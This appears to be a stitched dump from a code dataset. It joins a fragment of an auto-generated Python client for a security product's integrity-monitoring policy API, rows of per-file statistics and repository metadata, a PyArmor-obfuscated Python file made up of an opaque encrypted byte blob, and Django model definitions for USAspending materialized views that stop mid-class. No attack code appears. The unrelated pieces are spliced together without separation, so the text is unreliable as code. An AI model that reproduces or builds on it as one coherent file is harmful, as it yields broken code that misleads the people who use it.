`/\\d+/`") # noqa: E501 if 'integrity_monitoring_rule_id' in params and not re.search('\\d+', str(params['integrity_monitoring_rule_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `integrity_monitoring_rule_id` when calling `remove_integrity_monitoring_rule_id_from_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 
'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 if 'integrity_monitoring_rule_id' in params: path_params['integrityMonitoringRuleID'] = params['integrity_monitoring_rule_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments/{integrityMonitoringRuleID}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def set_integrity_monitoring_rule_ids_on_policy(self, policy_id, api_version, **kwargs): # noqa: E501 """Set Integrity Monitoring Rule IDs # noqa: E501 Set integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_integrity_monitoring_rule_ids_on_policy(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. 
(required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to set. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.set_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 else: (data) = self.set_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 return data def set_integrity_monitoring_rule_ids_on_policy_with_http_info(self, policy_id, api_version, **kwargs): # noqa: E501 """Set Integrity Monitoring Rule IDs # noqa: E501 Set integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to set. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. 
""" all_params = ['policy_id', 'api_version', 'integrity_monitoring_rule_ids', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method set_integrity_monitoring_rule_ids_on_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `set_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `set_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `set_integrity_monitoring_rule_ids_on_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None if 'integrity_monitoring_rule_ids' in params: body_params = params['integrity_monitoring_rule_ids'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = 
self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
51.247525
311
0.650966
3,086
25,880
5.182437
0.067401
0.109298
0.126555
0.084537
0.952417
0.948665
0.947352
0.933221
0.926655
0.916151
0
0.01515
0.268006
25,880
504
312
51.349206
0.829075
0.342736
0
0.786765
0
0
0.289823
0.12917
0
0
0
0
0
1
0.033088
false
0
0.014706
0
0.095588
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1c06a98490cee0eb3cd0cb851a8cf721d4cc8b8e
1,731
py
Python
legacy/functional_code/backprojection/constants.py
jjimmykang/bwsi-backprojection
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
[ "MIT" ]
1
2020-02-09T19:09:27.000Z
2020-02-09T19:09:27.000Z
legacy/functional_code/backprojection/constants.py
jjimmykang/bwsi-backprojection
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
[ "MIT" ]
null
null
null
legacy/functional_code/backprojection/constants.py
jjimmykang/bwsi-backprojection
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
[ "MIT" ]
null
null
null
__pyarmor__(__name__, __file__, b'\xeb\x50\x8c\x64\x26\x42\xd6\x01\x6f\x0f\x27\xa2\x64\x8d\x1e\xb5\x54\xd9\x61\x57\x2f\x56\x03\x35\x46\xfc\x25\x13\x9b\xa4\xd5\x79\x12\xdf\x07\xc8\x90\xe3\x6a\x8e\x9c\xc3\x2c\xef\xeb\x51\x2c\xd9\x53\x06\xf5\x41\x2c\xbb\x3d\xdb\xb5\xf7\xa6\xb1\x21\x95\x63\x51\x50\x56\x7c\x01\xc3\xb6\x7a\x0d\xab\xef\x9f\xb0\x9f\x66\x08\x13\xb6\x9d\xe2\x54\x87\x5f\x86\x89\xf1\xb0\x9c\x81\x30\x32\xa1\x09\x50\xad\xb8\xfd\xaf\x78\x9b\xed\xd5\xcc\x2b\xf2\x23\xf3\x7c\x24\xea\x3a\xf2\x44\x3b\x27\xe9\xa1\x50\x0a\x75\x34\x63\xee\xaa\x6a\xef\xdb\xed\x33\x37\xdc\x52\x24\x65\x52\x5b\x61\x8f\x32\x6d\xe7\x28\x2c\xb3\xc1\x0a\x5b\x8c\xdd\x66\xb6\x6f\x19\xdb\xb1\xc3\x28\x32\xdf\x65\xc2\x1f\xbb\x6f\x81\x6b\x8d\x13\x5e\x59\xb1\xe6\xd1\xb5\xbb\xba\xb0\x2b\x14\x1a\x7d\xea\xe8\x17\xd6\x28\x91\x68\xf5\x79\x9c\xfc\xd8\x31\xae\xab\x4e\xd8\xff\x38\x7e\xe0\x8c\x04\x3e\x3c\x0f\x1b\xc7\x11\x17\x6b\xc3\xe6\xf9\x16\x2d\x26\x54\x09\xfe\xc5\x6b\x26\x7c\x30\x1a\xdd\xfd\x97\xe6\x86\xa9\xfc\x84\x67\x75\xc0\x7e\x4c\xf1\xf9\xdb\x25\xa5\x7b\xe5\xf0\x9f\xfd\xc1\x5d\xb8\xc1\x43\xd4\x96\x8a\xa4\x0d\x4e\x1d\x5a\xa4\x6f\x7e\xed\x15\x9e\x0d\x9d\xb3\x72\xa7\xd3\x6e\xb0\x56\x26\x56\xb9\x97\xa3\xf1\x1c\xfe\x03\x2a\xdc\xe5\x4e\xf4\x43\x2f\x8d\x97\x83\x38\xeb\x2e\x7e\x3d\x6d\x57\x3d\x7e\xb3\xb8\x66\x51\x07\x69\x2a\x4d\x15\x05\x66\xb4\xf8\xaa\x3a\x8f\xd0\xa5\xc2\x0a\x2c\x71\x73\x71\x68\xe1\xfe\x84\x0e\xe7\x40\xc7\xb9\xbf\x4e\xfa\xc8\x1f\xa3\x46\x3b\x8a\x42\xf5\xae\x9a\x53\xcf\xbb\x32\x06\x75\x79\x38\x45\xad\x30\x1b\xc6\x94\x7e\x8a\xe4\x1c\xc7\x33\x6f\x0b\x65\x4f\x95\xba\x36\x75\x8f\x58\xe0\x55\xce\xa3\x8c\x69\x0c\x45\x1d\x2b\x0d\x8c\xfc\x0b\x86\x10\xc7\x43\x73\xe3\xc9\xd6\x62\x15\xe0\x02\xb7\x53\x86\x54\x27\x2d\x30\xb8\x08\xb9\xfc\x83', 1)
1,731
1,731
0.749856
428
1,731
3.004673
0.5
0
0
0
0
0
0
0
0
0
0
0.302662
0.001733
1,731
1
1,731
1,731
0.441551
0
0
0
0
1
0.976905
0.976905
0
1
0
0
0
1
0
true
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
1
1
1
0
0
0
0
1
1
1
null
1
0
0
0
0
0
1
0
0
0
0
0
0
10
1c9c723b80873c17a91f78e5376f4c8502626f4a
39,968
py
Python
usaspending_api/awards/models_matviews.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
null
null
null
usaspending_api/awards/models_matviews.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
1
2021-11-15T17:54:12.000Z
2021-11-15T17:54:12.000Z
usaspending_api/awards/models_matviews.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
null
null
null
import warnings from django.contrib.postgres.fields import ArrayField from django.contrib.postgres.search import SearchVectorField from django.core.cache import CacheKeyWarning from django.db import models from usaspending_api.awards.models import Award, Subaward, TransactionNormalized warnings.simplefilter("ignore", CacheKeyWarning) class UniversalTransactionView(models.Model): keyword_ts_vector = SearchVectorField() award_ts_vector = SearchVectorField() recipient_name_ts_vector = SearchVectorField() transaction = models.OneToOneField(TransactionNormalized, primary_key=True) action_date = models.DateField(blank=True, null=False) last_modified_date = models.DateField(blank=True, null=False) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) action_type = models.TextField() award_id = models.IntegerField() award_category = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) total_obligation = models.DecimalField( max_digits=15, decimal_places=2, blank=True, null=True) total_subsidy_cost = models.DecimalField(max_digits=20, decimal_places=2, null=True, blank=True) total_loan_value = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) total_obl_bin = models.TextField() fain = models.TextField() uri = models.TextField() piid = models.TextField() federal_action_obligation = models.DecimalField( max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) transaction_description = models.TextField() modification_number = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_state_code = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_zip5 = 
models.TextField() pop_congressional_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() naics_code = models.TextField() naics_description = models.TextField() product_or_service_code = models.TextField() product_or_service_description = models.TextField() pulled_from = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() cfda_number = models.TextField() cfda_title = models.TextField() recipient_id = models.IntegerField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() class Meta: managed = False db_table = 'universal_transaction_matview' class SummaryTransactionView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=False) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() total_obl_bin = models.TextField() 
generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField( max_digits=20, db_index=True, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_zip5 = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_zip5 = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_state_code = models.TextField() pop_congressional_code = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) cfda_number = models.TextField() cfda_title = models.TextField() product_or_service_code = models.TextField() product_or_service_description = models.TextField() naics_code = models.TextField() 
naics_description = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() counts = models.IntegerField() class Meta: managed = False db_table = 'summary_transaction_view' class UniversalAwardView(models.Model): keyword_ts_vector = SearchVectorField() award_ts_vector = SearchVectorField() recipient_name_ts_vector = SearchVectorField() award = models.OneToOneField(Award, primary_key=True) category = models.TextField() type = models.TextField() type_description = models.TextField() piid = models.TextField() fain = models.TextField() uri = models.TextField() total_obligation = models.DecimalField( max_digits=15, decimal_places=2, blank=True, null=True) description = models.TextField() total_subsidy_cost = models.DecimalField(max_digits=20, decimal_places=2, null=True, blank=True) total_loan_value = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) total_obl_bin = models.TextField() recipient_hash = models.UUIDField() recipient_id = models.IntegerField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) action_date = models.DateField() fiscal_year = models.IntegerField() last_modified_date = models.TextField() period_of_performance_start_date = models.DateField() period_of_performance_current_end_date = models.DateField() date_signed = models.DateField() original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = 
models.TextField() awarding_toptier_agency_code = models.TextField() funding_toptier_agency_code = models.TextField() awarding_subtier_agency_code = models.TextField() funding_subtier_agency_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_state_code = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_city_code = models.TextField() pop_zip5 = models.TextField() pop_congressional_code = models.TextField() cfda_number = models.TextField() sai_number = models.TextField() pulled_from = models.TextField() type_of_contract_pricing = models.TextField() extent_competed = models.TextField() type_set_aside = models.TextField() product_or_service_code = models.TextField() product_or_service_description = models.TextField() naics_code = models.TextField() naics_description = models.TextField() class Meta: managed = False db_table = 'universal_award_matview' class SummaryAwardView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() category = models.TextField(blank=True, null=True) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = 
models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_award_view' class SummaryView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view' class SummaryNaicsCodesView(models.Model): duh = models.UUIDField(primary_key=True, 
help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() naics_code = models.TextField(blank=True, null=True) naics_description = models.TextField(blank=True, null=True) generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view_naics_codes' class SummaryPscCodesView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() product_or_service_code = models.TextField(blank=True, null=True) generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view_psc_codes' class SummaryCfdaNumbersView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = 
models.TextField() cfda_number = models.TextField(blank=True, null=True) cfda_title = models.TextField(blank=True, null=True) generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view_cfda_number' class SummaryTransactionMonthView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() recipient_location_country_name = models.TextField() recipient_location_country_code = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_foreign_province = models.TextField() pop_country_name = models.TextField() pop_country_code = models.TextField() pop_state_code = models.TextField() pop_county_name = models.TextField() pop_county_code = models.TextField() pop_zip5 = models.TextField() pop_congressional_code = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() 
awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) cfda_number = models.TextField(blank=True, null=True) cfda_title = models.TextField(blank=True, null=True) product_or_service_code = models.TextField() product_or_service_description = models.TextField() naics_code = models.TextField(blank=True, null=True) naics_description = models.TextField(blank=True, null=True) total_obl_bin = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_transaction_month_view' class SummaryTransactionGeoView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() recipient_location_country_name = models.TextField() recipient_location_country_code = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_foreign_province = 
models.TextField() pop_country_name = models.TextField() pop_country_code = models.TextField() pop_state_code = models.TextField() pop_county_name = models.TextField() pop_county_code = models.TextField() pop_zip5 = models.TextField() pop_congressional_code = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_transaction_geo_view' class SummaryStateView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() distinct_awards = ArrayField(models.TextField(), default=list) pop_country_code = models.TextField() pop_state_code = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, 
null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_state_view' class AwardMatview(models.Model): generated_unique_award_id = models.TextField(primary_key=True, db_column='generated_unique_award_id') latest_transaction = models.ForeignKey(to='awards.TransactionMatview', to_field='generated_unique_transaction_id', db_column='latest_transaction_unique_id', related_query_name='latest_transaction') action_date = models.TextField() agency_id = models.TextField() assistance_type = models.TextField() awarding_agency_abbr = models.TextField() awarding_agency_code = models.TextField() awarding_agency_id = models.TextField() awarding_agency_name = models.TextField() awarding_office_code = models.TextField() awarding_office_name = models.TextField() awarding_sub_tier_agency_abbr = models.TextField() awarding_sub_tier_agency_c = models.TextField() awarding_sub_tier_agency_n = models.TextField() base_and_all_options_value = models.DecimalField(max_digits=15, decimal_places=2) business_categories = ArrayField(models.TextField()) business_funds_indicator = models.TextField() business_types = models.TextField() business_types_description = models.TextField() category = models.TextField() certified_date = models.DateTimeField() cfda_number = models.TextField() cfda_objectives = models.TextField() cfda_title = models.TextField() clinger_cohen_act_pla_desc = models.TextField() clinger_cohen_act_planning = models.TextField() commercial_item_acqui_desc = models.TextField() commercial_item_acquisitio = models.TextField() commercial_item_test_desc = models.TextField() commercial_item_test_progr = models.TextField() consolidated_contract = models.TextField() consolidated_contract_desc = models.TextField() contract_award_type_desc = models.TextField() cost_or_pricing_data = models.TextField() cost_or_pricing_data_desc = models.TextField() 
date_signed = models.TextField() construction_wage_rate_req = models.TextField() construction_wage_rat_desc = models.TextField() description = models.TextField() dod_claimant_prog_cod_desc = models.TextField() dod_claimant_program_code = models.TextField() domestic_or_foreign_e_desc = models.TextField() domestic_or_foreign_entity = models.TextField() evaluated_preference = models.TextField() evaluated_preference_desc = models.TextField() extent_compete_description = models.TextField() extent_competed = models.TextField() fain = models.TextField() fair_opportunity_limi_desc = models.TextField() fair_opportunity_limited_s = models.TextField() fed_biz_opps = models.TextField() fed_biz_opps_description = models.TextField() fiscal_year = models.TextField() foreign_funding = models.TextField() foreign_funding_desc = models.TextField() funding_agency_abbr = models.TextField() funding_agency_code = models.TextField() funding_agency_id = models.TextField() funding_agency_name = models.TextField() funding_office_code = models.TextField() funding_office_name = models.TextField() funding_sub_tier_agency_abbr = models.TextField() funding_sub_tier_agency_co = models.TextField() funding_sub_tier_agency_na = models.TextField() idv_type = models.TextField() idv_type_description = models.TextField() information_technolog_desc = models.TextField() information_technology_com = models.TextField() interagency_contract_desc = models.TextField() interagency_contracting_au = models.TextField() last_modified_date = models.DateTimeField() major_program = models.TextField() multi_year_contract = models.TextField() multi_year_contract_desc = models.TextField() multiple_or_single_aw_desc = models.TextField() multiple_or_single_award_i = models.TextField() naics = models.TextField() naics_description = models.TextField() number_of_offers_received = models.TextField() officer_1_amount = models.TextField() officer_1_name = models.TextField() officer_2_amount = models.TextField() officer_2_name = 
models.TextField() officer_3_amount = models.TextField() officer_3_name = models.TextField() officer_4_amount = models.TextField() officer_4_name = models.TextField() officer_5_amount = models.TextField() officer_5_name = models.TextField() other_than_full_and_o_desc = models.TextField() other_than_full_and_open_c = models.TextField() parent_award_piid = models.TextField() parent_recipient_unique_id = models.TextField() period_of_performance_current_end_date = models.DateTimeField() period_of_performance_start_date = models.DateTimeField() piid = models.TextField() pop_city_name = models.TextField() pop_code = models.TextField() pop_congressional_code = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_foreign_province = models.TextField() pop_state_code = models.TextField() pop_state_name = models.TextField() pop_zip5 = models.TextField() potential_total_value_of_award = models.DecimalField(max_digits=15, decimal_places=2) price_evaluation_adjustmen = models.TextField() product_or_service_co_desc = models.TextField() product_or_service_code = models.TextField() program_acronym = models.TextField() program_system_or_equ_desc = models.TextField() program_system_or_equipmen = models.TextField() pulled_from = models.TextField() purchase_card_as_paym_desc = models.TextField() purchase_card_as_payment_m = models.TextField() recipient_location_address_line1 = models.TextField() recipient_location_address_line2 = models.TextField() recipient_location_address_line3 = models.TextField() recipient_location_city_code = models.TextField() recipient_location_city_name = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() 
